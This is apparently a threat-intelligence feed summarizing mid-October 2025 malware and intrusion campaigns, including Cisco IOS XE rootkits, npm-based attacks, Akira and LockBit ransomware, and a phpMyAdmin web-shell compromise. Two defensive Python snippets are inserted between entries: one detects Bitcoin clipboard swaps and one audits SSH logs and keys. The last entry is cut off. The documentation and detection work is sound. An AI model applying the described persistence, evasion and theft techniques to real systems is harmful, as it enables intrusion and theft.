Intel Name:
Python_Infostealer_Clipboard_Image_Theft
Date of Scan:
2025-10-16
Impact:
MEDIUM
Summary:
Researchers at ISC.SANS have identified a Python-based infostealer designed to capture and exfiltrate images copied to a system clipboard. The malware extends the functionality of traditional clipboard stealers, which typically focus on text or cryptocurrency data, by targeting image content shared between virtual and host environments. Using the Python ImageGrab library from the Pillow package, the infostealer retrieves clipboard images, converts them into standard formats, and transmits them to an attacker-controlled command-and-control channel over Telegram. The sample analyzed by SANS researchers included Vietnamese-language debug strings, suggesting a reused or regionally developed codebase. The malware operates at user privilege level and exploits shared clipboard functionality, enabling it to access host clipboard data from virtualized environments without elevated permissions.
Source: https://isc.sans.edu/diary/rss/32372
2025-10-16
Operation_Zero_Disco
HIGH
Intel Source:
Trend Micro
Intel Name:
Operation_Zero_Disco
Date of Scan:
2025-10-16
Impact:
HIGH
Summary:
Trend Micro researchers have uncovered an exploitation of a Cisco SNMP vulnerability (CVE-2025-20352) to gain remote code execution on Cisco IOS XE-based switches. The affected devices include Cisco Catalyst 9400, 9300, and legacy 3750G series devices. Upon successful exploitation, the attackers deploy a Linux rootkit designed to maintain long-term access and conceal malicious activity. The implant establishes a UDP-based backdoor with a custom controller capable of disabling or deleting logs, bypassing authentication and terminal access controls, hiding configuration changes, and modifying timestamps to obscure evidence of compromise. In addition, the attackers use ARP spoofing from compromised Cisco shells to impersonate trusted hosts and bypass internal firewalls, enabling cross-VLAN routing and extensive lateral movement from a single core switch. Furthermore, the rootkit can inject a universal backdoor password by hooking into low-level authentication routines within the device’s memory and can conceal sensitive information to evade detection and maintain persistence.
Source: https://www.trendmicro.com/en_us/research/25/j/operation-zero-disco-cisco-snmp-vulnerability-exploit.html
2025-10-15
PolarEdge_Backdoor
MEDIUM
Intel Source:
Sekoia
Intel Name:
PolarEdge_Backdoor
Date of Scan:
2025-10-15
Impact:
MEDIUM
Summary:
Sekoia researchers have identified PolarEdge, a Linux backdoor targeting ARM and x86 NAS devices that implements a custom binary protocol over TLS to enable remote command execution. The implant is deployed after initial exploitation activity; it then fingerprints the host and reaches out to its C2 using a simple binary protocol over TLS. It supports on-demand payload download and execution, a connect-back mode that fetches files from an operator-specified host, and a debug mode used to update its configuration. The malware uses anti-analysis measures, including section encryption, an affine cipher for strings, and process masquerading. It prefers stealth over persistence, re-executing via a child process instead of installing durable startup entries. The operator’s objective is to maintain control of compromised edge devices for further tasking, rather than immediate destruction.
Source: https://blog.sekoia.io/polaredge-backdoor-qnap-cve-2023-20118-analysis/
2025-10-15
EvilAI_Malware_Campaign
MEDIUM
Intel Source:
Polyswarm
Intel Name:
EvilAI_Malware_Campaign
Date of Scan:
2025-10-15
Impact:
MEDIUM
Summary:
The EvilAI malware campaign is a global cyber operation that leverages AI-generated code and digitally signed fraudulent applications to infiltrate systems across critical sectors, including manufacturing, government, and healthcare. These malicious applications masquerade as legitimate productivity tools and are distributed through fake websites, SEO manipulation, and social media promotions. Once installed, EvilAI deploys an obfuscated JavaScript payload that executes within Node.js, establishes persistence via scheduled tasks and registry modifications, and communicates with its C2 servers using AES-256-CBC encryption. It further exploits Windows Management Instrumentation (WMI) to steal browser credentials by duplicating sensitive data files from Google Chrome and Microsoft Edge. EvilAI’s modular architecture allows it to download files, modify registry entries, execute processes, and potentially deploy additional payloads.
Source: https://blog.polyswarm.io/evilai
2025-10-15
Flax_Typhoon_Exploiting_ArcGIS_Server
MEDIUM
Intel Source:
Reliaquest
Intel Name:
Flax_Typhoon_Exploiting_ArcGIS_Server
Date of Scan:
2025-10-15
Impact:
MEDIUM
Summary:
Researchers at ReliaQuest discovered that the China-linked APT group Flax Typhoon (also known as Ethereal Panda) compromised an ArcGIS Server by exploiting a legitimate ArcGIS Server Object Extension (SOE). This allowed the attackers to covertly execute commands and move laterally within the network while blending their activity with normal traffic, without using traditional malware. For persistence, they installed a renamed VPN component as a Windows service that automatically started at boot, allowing long-term remote access without deploying custom malware. Once inside, the threat actors conducted environment reconnaissance, credential theft, and file collection, including Active Directory data and other sensitive files. The compromise is particularly impactful because the targeted ArcGIS Server acted as a gateway to internal systems, posing a serious risk to critical geospatial, planning, and emergency-management workflows.
Source: https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise
2025-10-15
Beamglea_Phish_npm_CDN_Credential_Theft
MEDIUM
Intel Source:
Snyk
Intel Name:
Beamglea_Phish_npm_CDN_Credential_Theft
Date of Scan:
2025-10-15
Impact:
MEDIUM
Summary:
Researchers at Snyk identified a large-scale phishing operation that abuses the npm open-source ecosystem to deliver credential-harvesting scripts through trusted web infrastructure. Instead of the conventional method of compromising developers during package installation, the threat actors exploited npm’s automatic CDN service to serve phishing payloads directly to victims’ browsers. The campaign involved the automated creation of hundreds of low-content npm packages that, once published, were instantly mirrored on the unpkg content delivery network. These hosted scripts were embedded within phishing lures masquerading as invoices or security verification pages. The malicious JavaScript mimicked legitimate Cloudflare browser checks, redirected users to attacker-controlled login portals, and exfiltrated credentials while implementing anti-analysis measures to avoid inspection. Technical indicators from the campaign suggest a structured and scalable approach designed to bypass security filters by leveraging legitimate developer infrastructure.
Source: https://snyk.io/blog/phishing-campaign-leveraging-the-npm-ecosystem/
2025-10-15
RedTail_Malware_SSH_Based_Cryptojacking_Campaign
MEDIUM
Intel Source:
ISC.SANS
Intel Name:
RedTail_Malware_SSH_Based_Cryptojacking_Campaign
Date of Scan:
2025-10-15
Impact:
MEDIUM
Summary:
Researchers at ISC.SANS have identified ongoing cryptojacking activity attributed to the RedTail malware family, which targets Linux systems through brute-forced SSH access. First observed in early 2024, RedTail is designed to hijack CPU resources for Monero cryptocurrency mining while maintaining a low operational footprint to evade detection. Once attackers gain access, they deploy automated scripts to install the miner, remove competing processes, and implant their own SSH keys for persistent access. The malware also performs system discovery to confirm compatibility before execution and deletes traces to conceal its presence. RedTail communicates via outbound encrypted HTTPS traffic to remote servers, blending malicious activity within legitimate network flows.
Source: https://isc.sans.edu/diary/Guest+Diary+Building+Better+Defenses+RedTail+Observations+from+a+Honeypot/32312/
2025-10-14
DPRK_Contagious_Interview_Campaign
MEDIUM
Intel Source:
Socket
Intel Name:
DPRK_Contagious_Interview_Campaign
Date of Scan:
2025-10-14
Impact:
MEDIUM
Summary:
Researchers at Socket have uncovered a North Korean state-sponsored campaign, dubbed “Contagious Interview,” that abuses the npm registry to target developers. The operation begins with recruiter-themed social engineering on LinkedIn and related platforms, where developers in the Web3, cryptocurrency, and blockchain sectors are enticed with fake job opportunities and coding assignments. The threat actors leverage typosquatted or re-uploaded npm packages containing install-time scripts and loaders that execute during installation, enabling code execution on victim machines. These packages exploit npm lifecycle hooks and use impersonated maintainer accounts to evade detection and maintain persistence even after package takedowns. The campaign’s BeaverTail loader establishes HTTPS and WebSocket-based C2 channels, retrieving a secondary component named InvisibleFerret, which enables cross-platform operations on Windows, macOS, and Linux systems. The attackers’ primary objectives include credential and crypto-asset theft, reconnaissance of developer environments, and establishing persistent backdoor access for further exploitation.
Source: https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages
2025-10-14
Akira_SonicWall_VPN_Exploitation_Campaign
HIGH
Intel Source:
Darktrace
Intel Name:
Akira_SonicWall_VPN_Exploitation_Campaign
Date of Scan:
2025-10-14
Impact:
HIGH
Summary:
Researchers at Darktrace have identified a targeted campaign by the Akira ransomware group exploiting SonicWall SSL VPN vulnerabilities between July and August 2025. The operation leveraged the previously disclosed flaw CVE-2024-40766 to gain unauthorized access to corporate networks. Following exploitation, the attackers conducted network reconnaissance, credential theft, and lateral movement using legitimate administrative protocols such as WinRM and RDP. Akira actors employed Kerberos authentication abuse and pass-the-hash techniques to escalate privileges and establish persistence within compromised environments. Subsequent stages involved data exfiltration and the deployment of ransomware payloads. Darktrace’s Managed Detection and Response team contained the intrusion through automated blocking actions, preventing further propagation and encryption events.
Source: https://www.darktrace.com/blog/inside-akiras-sonicwall-campaign-darktraces-detection-and-response
2025-10-13
OceanLotus_Campaign_Targets_Critical_Infrastructure
HIGH
Intel Source:
TahirSec
Intel Name:
OceanLotus_Campaign_Targets_Critical_Infrastructure
Date of Scan:
2025-10-13
Impact:
HIGH
Summary:
Researchers at TahirSec have analyzed a new OceanLotus (APT32/APT-Q-31) campaign deploying the Havoc Demon RAT. The Vietnam-linked actor, active since at least 2012 and previously focused on Chinese government, defense, energy, and research targets, has broadened operations across East and Southeast Asian critical infrastructure, including the energy, healthcare, and information sectors. The campaign uses DLL hollowing and VEH exception handling to stealthily deploy a shellcode payload (shellcode.dll) from a loader (msmpi.dll) that establishes persistence via the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftMPI and injects the payload through advapi32.dll. The RAT then dynamically loads ntdll.dll, kernel32.dll, and iphlpapi.dll and employs API hashing for anti-analysis. Its C2 communication uses HTTPS POST requests to an IP address, exfiltrating host identifiers and environment metadata (hostnames, usernames, IPs, process architecture, OS version) encrypted with AES-256-CTR. The use of the open-source Havoc Framework suggests OceanLotus is evolving toward more modular, framework-based, and scalable post-exploitation capabilities.
Source: https://mp.weixin.qq.com/s/rW_xSgKlV6r0_JXIjr97Rg
2025-10-13
CL0P_Oracle_EBS_ZeroDay_Extortion_Attack
HIGH
Intel Source:
Google Threat Intelligence (Mandiant)
Intel Name:
CL0P_Oracle_EBS_ZeroDay_Extortion_Attack
Date of Scan:
2025-10-13
Impact:
HIGH
Summary:
Researchers at Google Threat Intelligence Group and Mandiant have identified a widespread extortion campaign exploiting a previously unknown vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. The threat actors, believed to be associated with the CL0P extortion operation, leveraged this zero-day flaw to gain unauthorized access to enterprise systems and exfiltrate sensitive data. The campaign began in late September 2025, with exploitation activity traced back to July, predating Oracle’s official patch release in early October. The attackers deployed multi-stage Java-based malware chains—GOLDVEIN.JAVA and SAGEGIFT—facilitating remote code execution, in-memory payload delivery, and post-exploitation reconnaissance from compromised application accounts. Mandiant observed strong technical and behavioral overlaps with previous activity attributed to FIN11 and UNC5936, suggesting shared tooling or operational alignment within established financially motivated threat ecosystems. The actors demonstrated a high level of operational maturity through automated exploitation, extortion-at-scale tactics, and use of established leak infrastructure.
Source: https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation
2025-10-13
LockBit_5_0
HIGH
Intel Source:
Polyswarm
Intel Name:
LockBit_5_0
Date of Scan:
2025-10-13
Impact:
HIGH
Summary:
Researchers at PolySwarm have discovered a new version of LockBit ransomware (LockBit 5.0) that targets Windows, Linux, and VMware ESXi systems. This version is more advanced, using stronger obfuscation and anti-analysis techniques to avoid detection. The Windows variant hides its payload through packing and DLL reflection, disables security services, and clears event logs. The Linux version offers similar capabilities and allows attackers to choose which files or directories to encrypt. The ESXi version is tailored for virtual environments, enabling ransomware to spread quickly across multiple virtual machines from a single compromised host. LockBit 5.0 also randomizes file extensions and hides original file information, reducing the chance of file recovery. The ransomware avoids infecting systems using Russian language or regional settings, consistent with its previous versions. Overall, LockBit 5.0 is a powerful, cross-platform ransomware that increases the risk of large-scale network disruptions.
Source: https://blog.polyswarm.io/lockbit-5.0
2025-10-13
AsyncRAT_Targets_Colombians_Users
MEDIUM
Intel Source:
Seqrite
Intel Name:
AsyncRAT_Targets_Colombians_Users
Date of Scan:
2025-10-13
Impact:
MEDIUM
Summary:
Seqrite researchers uncovered a phishing campaign written in Spanish that impersonates Colombia’s judicial system to deliver AsyncRAT through a multi-stage infection chain. The attack begins with a spoofed judicial notice containing an SVG attachment that launches a browser-based sequence to download a malicious HTA file. The HTA executes script stages and a PowerShell downloader, which retrieves a .NET loader. The loader performs anti-VM checks, establishes persistence, and injects AsyncRAT into a legitimate Windows process to evade detection. Once active, AsyncRAT enables keylogging, screen capture, process and service manipulation, and data exfiltration over TLS using chunked transmission for stealth and reliability. The campaign primarily targets Colombian users and officials, focusing on long-term access and information theft rather than disruption.
Source: https://www.seqrite.com/blog/judicial-notification-phish-colombia-svg-asyncrat/
2025-10-12
RADAR_Ransomware_Activity_Resurfaces
MEDIUM
Intel Source:
The Raven File
Intel Name:
RADAR_Ransomware_Activity_Resurfaces
Date of Scan:
2025-10-12
Impact:
MEDIUM
Summary:
Researchers at TheRavenFile have identified renewed infrastructure and operational indicators linked to the RADAR Ransomware group, believed to be connected to the earlier Dispossessor Ransomware network active in 2020–2021. The group appears to have reconstituted its data leak platform, targeting approximately ten corporate entities, with U.S.-based organizations most frequently affected. The observed activity indicates a continued focus on double extortion tactics, where victim data is exfiltrated and exposed through an automated leak site framework. The actor demonstrates moderate technical proficiency, leveraging automated tools for victim data staging and evidence generation, and maintaining both clearweb and dark web resources for publication and negotiation. Although direct infection vectors were not detailed, the operational model suggests persistence of known ransomware behaviors centered on data theft, extortion, and publicity-driven pressure.
Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/RADAR%20Ransomware
2025-10-12
Email_Campaigns_Deliver_RATs_and_Infostealers
MEDIUM
Intel Source:
ForcePoint
Intel Name:
Email_Campaigns_Deliver_RATs_and_Infostealers
Date of Scan:
2025-10-12
Impact:
MEDIUM
Summary:
Researchers at Forcepoint have observed a surge in phishing emails that use malicious JavaScript attachments to deliver information-stealing malware and remote access tools (RATs) across multiple industries. These emails are disguised as routine business communications, such as purchase orders, shipment updates, or quotations, and often written in the recipient’s local language to appear legitimate. The malicious JavaScript files are typically concealed within archive attachments and execute PowerShell commands to download additional payloads. In many cases, the malware is embedded within PNG images containing Base64-encoded data between BaseStart and BaseEnd markers, which is decoded into executable files. Once executed, the malware checks whether it is running in a virtual machine or under observation, injects itself into legitimate processes to execute only in memory, and maintains persistence on the system. Its primary objectives include credential theft, mailbox access, and remote control, with data exfiltration observed over SMTP and FTP channels.
Source: https://www.forcepoint.com/blog/x-labs/q3-2025-threat-brief-obfuscated-javascript-steganography
2025-10-11
CN_APT_Serbian_Gov_Spearphish_Intrusion
HIGH
Intel Source:
StrikeReady Labs
Intel Name:
CN_APT_Serbian_Gov_Spearphish_Intrusion
Date of Scan:
2025-10-11
Impact:
HIGH
Summary:
Researchers at StrikeReady Labs have identified a targeted spearphishing campaign attributed to a Chinese nation-state–linked advanced persistent threat (APT) actor aimed at the Serbian government. The activity began with a phishing email delivering a malicious attachment themed around the National Academy for Public Administration. Upon interaction, the lure directed victims to a fake Cloudflare verification page impersonating Microsoft’s login portal, leading to the execution of an obfuscated PowerShell payload. Analysis revealed the use of a DLL sideloading technique involving a Canon Printer Assistant binary to deploy a variant of the Sogu (PlugX/Korplug) malware family. This campaign demonstrates strong operational maturity, combining layered obfuscation, custom encoding, and realistic decoy documents to evade detection and maintain persistence. Subsequent investigation linked the campaign to coordinated targeting of multiple European government entities, highlighting its regional espionage focus. The operation’s objectives appear consistent with long-term intelligence collection, aligning with historical Chinese APT tradecraft observed in prior PlugX deployments.
Source: https://strikeready.com/blog/cn-apt-targets-serbian-government/
2025-10-11
Nirorat_Polymorphic_Python_Remote_Access_Trojan
HIGH
Intel Source:
ISC.SANS
Intel Name:
Nirorat_Polymorphic_Python_Remote_Access_Trojan
Date of Scan:
2025-10-11
Impact:
HIGH
Summary:
Researchers at ISC.SANS have identified a previously undocumented Python-based Remote Access Trojan (RAT) exhibiting advanced polymorphic behavior. The malware, referred to as Nirorat, leverages Python’s introspection features to dynamically modify its own source code at runtime, enabling it to evade traditional static and signature-based detection methods. Through functions that alter variable names, shuffle function order, and inject junk code, the malware mutates its structure with each execution. It also uses in-memory encryption and decryption routines to obscure critical sections of code and execute them directly from memory. Analysis of its functionality reveals a comprehensive suite of capabilities typical of mature RAT families, including remote command execution, credential harvesting, system reconnaissance, and data exfiltration, as well as audio, screen, and keylogging features.
Source: https://isc.sans.edu/diary/rss/32354
2025-10-11
Shuyal_Stealer_Multi_Browser_Credential_Theft
HIGH
Intel Source:
Point Wild
Intel Name:
Shuyal_Stealer_Multi_Browser_Credential_Theft
Date of Scan:
2025-10-11
Impact:
HIGH
Summary:
Researchers at Point Wild have identified a new information-stealing malware dubbed Shuyal Stealer, which significantly broadens the scope of traditional browser-targeting threats. Written in 64-bit C++, the malware targets 19 different web browsers, including Chrome, Edge, Firefox, Brave, Opera, and Vivaldi, to extract stored credentials, cookies, and autofill data. It performs deep system profiling through Windows Management Instrumentation (WMI) to collect hardware identifiers and configuration data, enabling tailored attacks on infected machines. Shuyal employs sophisticated evasion tactics by forcefully terminating and permanently disabling the Windows Task Manager via registry modification, hindering detection and manual removal.
Source: https://www.pointwild.com/threat-intelligence/shuyal-stealer-advanced-infostealer-targeting-19-browsers
2025-10-11
Chinese_Attackers_Abuse_phpMyAdmin
HIGH
Intel Source:
Huntress
Intel Name:
Chinese_Attackers_Abuse_phpMyAdmin
Date of Scan:
2025-10-11
Impact:
HIGH
Summary:
Huntress researchers uncovered a China-linked cyber campaign that began when attackers exploited an exposed phpMyAdmin panel to gain access through SQL log poisoning and a one-line PHP web shell used for remote command execution. Once inside, they leveraged an AntSword-style virtual terminal to directly control the compromised server and conduct system reconnaissance. The attackers then installed the open-source Nezha monitoring agent to establish persistent access, followed by the deployment of a modified Ghost RAT (Gh0st) variant capable of process injection and maintaining service-level persistence. To evade detection, the attackers modified Windows Defender exclusions and maintained continuous C2 communication through both Nezha and the RAT. Victims were identified across East and Southeast Asia, with additional instances in Europe and the Americas, indicating that the attackers were targeting organizations around the world.
Source: https://www.huntress.com/blog/nezha-china-nexus-threat-actor-tool
2025-10-10
Detour_Dog_Turns_DNS_Into_Malware_Delivery_System
HIGH
Intel Source:
Infoblox
Intel Name:
Detour_Dog_Turns_DNS_Into_Malware_Delivery_System
Date of Scan:
2025-10-10
Impact:
HIGH
Summary:
Infoblox researchers have identified that the threat actor known as Detour Dog has been operating a DNS-based malware platform since at least August 2023, evolving from simple scam redirect schemes into a sophisticated infrastructure for command-and-control (C2) and malware delivery. The malware is embedded across tens of thousands of compromised websites globally, selectively redirecting users or executing code based on device type and geographic location. In 2025, this infrastructure was used to stage and distribute Strela Stealer—an infostealer linked to Hive0145—and the StarFish backdoor. A key tactic involves the use of DNS TXT records to deliver payload URLs, with commands prefixed by “down” triggering remote code execution on the server side. This obfuscation method hides true hosting locations and misleads defenders. Detour Dog also collaborates with spam botnets like REM Proxy and Tofsee to deliver malicious attachments that initiate the DNS-based infection chain. In August 2025, Shadowserver's sinkholing of Detour Dog domains revealed over 39 million TXT record queries in just 48 hours, originating from nearly 30,000 infected sites across 584 top-level domains, with the U.S., Germany, and Taiwan being the top traffic sources. The shift from ad fraud to supporting data theft through cooperation with actors like Hive0145 highlights Detour Dog’s transformation into a malware-as-a-service provider.
Source: https://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/
2025-10-10
Fake_Teams_Installers_Drop_Oyster_Backdoor
MEDIUM
Intel Source:
Socradar
Intel Name:
Fake_Teams_Installers_Drop_Oyster_Backdoor
Date of Scan:
2025-10-10
Impact:
MEDIUM
Summary:
SOCRadar researchers have identified a new malvertising and SEO poisoning campaign that impersonates Microsoft Teams installers to distribute the Oyster (aka Broomstick) backdoor. When victims download and execute the trojanized installer, it deploys a malicious DLL in a user-writable directory and establishes persistence by creating a scheduled task named CaptureService, executed via rundll32. Once activated, Oyster connects to its command-and-control (C2) server, enabling threat actors to perform system reconnaissance, data exfiltration, and lateral movement within the network. The malware can also load additional payloads, including ransomware, significantly increasing the operational impact. The campaign leverages fake advertisements and manipulates search results rather than software exploits for initial access and appears to have a global reach. The attackers primarily target IT managers and organizations in the healthcare, finance, and professional services sectors.
Source: https://socradar.io/fake-microsoft-teams-installers-oyster-backdoor/
2025-10-09
A_New_Variant_of_Chaos_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
A_New_Variant_of_Chaos_Ransomware
Date of Scan:
2025-10-09
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have identified a new C++ variant of the Chaos ransomware that targets Windows systems. The malware poses as a fake “System Optimizer v2.1”, writes an execution log, and then launches its payload with administrator privileges. It enforces single-instance execution via a mutex and, if a prior infection is detected, switches to a monitoring mode instead of re-encrypting files. When active, the ransomware scans common user directories and applies a size-based file selection strategy, encrypting some files and deleting others outright to maximize pressure on the victim. It primarily uses AES-256-CFB encryption via the Windows CryptoAPI, deletes shadow copies, tampers with boot configuration data, and overwrites original files to block recovery. After encryption, it drops a ransom note, shows a message box, and displays progress messages to the victim. A notable new feature is a clipper routine that hijacks Bitcoin addresses on the clipboard, replacing them with attacker-controlled wallets to redirect ransom payments. Overall, this variant is designed for speed, disruption, and maximum impact.
Source: https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous
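The clipboard hijack in the entry above only works if the substituted string is itself a checksum-valid Bitcoin address, otherwise the victim's wallet rejects it; that constraint is what makes the swap detectable. The Python below is an added example for this feed, not Fortinet's or the ransomware's code: it implements Base58Check validation for legacy "1..." and "3..." addresses and a clipboard-monitor rule that fires when one valid address is replaced by a different valid address. The victim address is the public Bitcoin genesis address; the "attacker" address is minted from a dummy hash and controls nothing. Bech32 (bc1...) addresses are out of scope for this snippet.

```python
import hashlib

B58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
P2PKH, P2SH = 0x00, 0x05  # mainnet version bytes for legacy "1..." and "3..." addresses


def b58encode(data: bytes) -> str:
    n = int.from_bytes(data, 'big')
    out = ''
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    pad = len(data) - len(data.lstrip(b'\x00'))   # each leading zero byte becomes a leading '1'
    return '1' * pad + out


def b58decode(s: str) -> bytes:
    n = 0
    for ch in s:
        if ch not in B58_ALPHABET:
            raise ValueError(f'invalid base58 character {ch!r}')
        n = n * 58 + B58_ALPHABET.index(ch)
    raw = n.to_bytes((n.bit_length() + 7) // 8, 'big') if n else b''
    pad = len(s) - len(s.lstrip('1'))
    return b'\x00' * pad + raw


def checksum(payload: bytes) -> bytes:
    """Base58Check checksum: first four bytes of double SHA-256."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def is_base58_btc_address(s: str) -> bool:
    """True for a well-formed mainnet P2PKH/P2SH address: 25 bytes, known version byte,
    valid checksum. Bech32 (bc1...) addresses are not handled here."""
    try:
        raw = b58decode(s)
    except ValueError:
        return False
    return len(raw) == 25 and raw[0] in (P2PKH, P2SH) and checksum(raw[:21]) == raw[21:]


def make_address(version: int, hash160: bytes) -> str:
    """Build an address from a 20-byte hash; used here to mint a constructed attacker wallet."""
    if len(hash160) != 20:
        raise ValueError('hash160 must be 20 bytes')
    payload = bytes([version]) + hash160
    return b58encode(payload + checksum(payload))


def detect_clipper_swap(copied: str, pasted: str) -> bool:
    """Clipboard-monitor rule: the text the user copied was a valid BTC address and what came
    back out of the clipboard is a *different* valid BTC address. Ordinary edits, typos and
    non-address text never satisfy both halves, so the rule is quiet in normal use."""
    a, b = copied.strip(), pasted.strip()
    return a != b and is_base58_btc_address(a) and is_base58_btc_address(b)


# Constructed values: the genesis address is public; the attacker wallet is minted from a dummy hash.
VICTIM_ADDRESS = '1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa'
ATTACKER_ADDRESS = make_address(P2PKH, bytes(range(1, 21)))

if __name__ == '__main__':
    print('valid victim address:', is_base58_btc_address(VICTIM_ADDRESS))
    print('swap detected:', detect_clipper_swap(VICTIM_ADDRESS, ATTACKER_ADDRESS))
    print('no swap:', detect_clipper_swap(VICTIM_ADDRESS, VICTIM_ADDRESS))
```

On an endpoint the same rule runs against the clipboard before and after a short delay (the clipper needs a moment to rewrite it); the address comparison, not the clipboard API, is the part that matters.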
2025-10-09
RedTail_Cryptojacking_Activity
MEDIUM
+
Intel Source:
ISC.SANS
Intel Name:
RedTail_Cryptojacking_Activity
Date of Scan:
2025-10-09
Impact:
MEDIUM
Summary:
Researchers at the SANS Internet Storm Center (ISC) have identified ongoing RedTail cryptojacking activity targeting systems with exposed SSH services. RedTail, first observed in early 2024, mines Monero by hijacking the computational resources of compromised hosts. The malware gains access through brute-forced SSH logins and then runs automated scripts to configure its environment and remove competing miners. Persistence is achieved by implanting SSH keys, allowing the attackers to return without repeating the brute-force attack. The campaign spans several phases of the attack lifecycle (reconnaissance, weaponization, execution, persistence, defense evasion, and command-and-control).
Source: https://isc.sans.edu/diary/rss/32312
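Two artifacts from the entry above are visible without any agent: the brute-force-then-success sequence in sshd's auth log, and the implanted key in authorized_keys. The Python below is an added example for this feed, not SANS ISC code; it correlates failed and accepted logins per source IP and audits an authorized_keys file against an allowlist of SHA256 fingerprints computed the same way `ssh-keygen -lf` prints them. The log lines, key blobs and fingerprints are constructed.

```python
import base64
import hashlib
import re
from collections import defaultdict

# Constructed OpenSSH auth log excerpt (not SANS ISC honeypot data).
SAMPLE_AUTH_LOG = """\
Oct  9 03:14:01 web1 sshd[2311]: Failed password for root from 198.51.100.23 port 51022 ssh2
Oct  9 03:14:03 web1 sshd[2313]: Failed password for root from 198.51.100.23 port 51030 ssh2
Oct  9 03:14:05 web1 sshd[2315]: Failed password for root from 198.51.100.23 port 51038 ssh2
Oct  9 03:14:07 web1 sshd[2317]: Failed password for root from 198.51.100.23 port 51046 ssh2
Oct  9 03:14:09 web1 sshd[2319]: Failed password for root from 198.51.100.23 port 51054 ssh2
Oct  9 03:14:11 web1 sshd[2321]: Failed password for root from 198.51.100.23 port 51062 ssh2
Oct  9 03:14:20 web1 sshd[2330]: Accepted password for root from 198.51.100.23 port 51100 ssh2
Oct  9 03:15:02 web1 sshd[2340]: Accepted publickey for root from 198.51.100.23 port 51150 ssh2: RSA SHA256:Cq8kI1m0vbP3Dq8mVHn0nYq1oQe3t2bB2eY6LlSbs9Q
Oct  9 08:00:00 web1 sshd[4001]: Accepted publickey for alice from 10.0.0.12 port 40000 ssh2: ED25519 SHA256:Jc9nGc2k4V1fSx0nTqh5G9nOy0pIuY8sH6yB5Q0w7Zs
Oct  9 08:00:05 web1 sshd[4002]: Failed password for invalid user admin from 203.0.113.5 port 2222 ssh2
"""

SSHD_RE = re.compile(
    r'sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>[\d.]+) port \d+')


def brute_force_successes(log_text, min_failures=5):
    """Source IPs whose first accepted login followed at least `min_failures` failures,
    i.e. a brute force that worked; reports the account and auth method used."""
    failures = defaultdict(int)
    hits = {}
    for line in log_text.splitlines():
        m = SSHD_RE.search(line)
        if not m:
            continue
        ip = m.group('ip')
        if m.group('result') == 'Failed':
            failures[ip] += 1
        elif ip not in hits and failures[ip] >= min_failures:
            hits[ip] = {'failures': failures[ip], 'user': m.group('user'), 'method': m.group('method')}
    return hits


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob (what ssh-keygen -lf prints)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return 'SHA256:' + base64.b64encode(digest).decode().rstrip('=')


# Constructed key blobs; real entries carry the actual public-key wire format.
KNOWN_BLOB = base64.b64encode(b'constructed-admin-key-material').decode()
ROGUE_BLOB = base64.b64encode(b'constructed-implanted-key-material').decode()
SAMPLE_AUTHORIZED_KEYS = (
    "# ~root/.ssh/authorized_keys (constructed)\n"
    f"ssh-ed25519 {KNOWN_BLOB} admin@bastion\n"
    f"ssh-rsa {ROGUE_BLOB} root@localhost\n"
)
ALLOWED_FINGERPRINTS = {fingerprint(KNOWN_BLOB)}
KEY_TYPES = ('ssh-', 'ecdsa-', 'sk-')


def audit_authorized_keys(text, allowed):
    """Flag authorized_keys entries whose fingerprint is not on the allowlist."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split()
        # options such as from="..." or command="..." may precede the key type
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(parts):
            findings.append((lineno, 'unparseable entry', line[:40]))
            continue
        fp = fingerprint(parts[idx + 1])
        comment = ' '.join(parts[idx + 2:])
        if fp not in allowed:
            findings.append((lineno, 'unknown key', f'{fp} {comment}'.strip()))
    return findings


if __name__ == '__main__':
    print('brute-force successes:', brute_force_successes(SAMPLE_AUTH_LOG))
    print('authorized_keys findings:', audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED_FINGERPRINTS))
```

The second function is the one to schedule: once the key is implanted, the next logins are clean "Accepted publickey" events that no failure-count rule will catch, so the allowlist diff has to run on its own.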
2025-10-09
Akira_Reloaded
HIGH
+
Intel Source:
Polyswarm
Intel Name:
Akira_Reloaded
Date of Scan:
2025-10-09
Impact:
HIGH
Summary:
PolySwarm researchers have observed a significant rise in Akira ransomware attacks since July 2025, primarily driven by affiliates exploiting SonicWall VPN vulnerabilities to gain initial access. The attackers use stolen credentials and bypass MFA, then move quickly to complete their attacks within just 55 minutes by using various tools to scan networks, find valuable systems through Active Directory (AD) enumeration, and collect sensitive data for exfiltration. Akira’s affiliates often create new local or domain accounts and use remote management tools to maintain access. They have also been observed disabling endpoint security using vulnerable driver exploits. Once deployed, the ransomware payload encrypts both local and shared network files, followed by double extortion tactics, where stolen data is threatened to be leaked if victims refuse to pay. The campaign targets a wide range of sectors across the US, Europe, South America, Australia, Canada, India, and Africa, reflecting a well-organized RaaS model with active affiliates and significant financial motivation.
Source: https://blog.polyswarm.io/akira-reloaded
2025-10-09
Velociraptor_Enabled_Ransomware_Operation
HIGH
+
Intel Source:
Cisco Talos
Intel Name:
Velociraptor_Enabled_Ransomware_Operation
Date of Scan:
2025-10-09
Impact:
HIGH
Summary:
